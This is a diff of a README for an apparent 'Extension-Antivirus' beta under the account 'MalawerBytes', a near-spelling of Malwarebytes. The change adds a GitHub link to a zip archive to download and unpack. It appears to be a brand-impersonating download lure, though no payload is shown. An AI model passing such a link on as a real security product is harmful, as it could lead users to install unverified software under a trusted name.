MalawerBytes/Extension-Antivirus/README.md

 ~ HOW TO INSTALL OUR BETA PROJECT ~

-1 - Download the "Malwarebytes - antiviruses.zip" and un-zip the files into a folder.
+1 - Download the "https://github.com/MalawerBytes/Extension-Antivirus/blob/main/Malwarebytes%20-%20antiviruses.zip" and un-zip the files into a folder.

 ~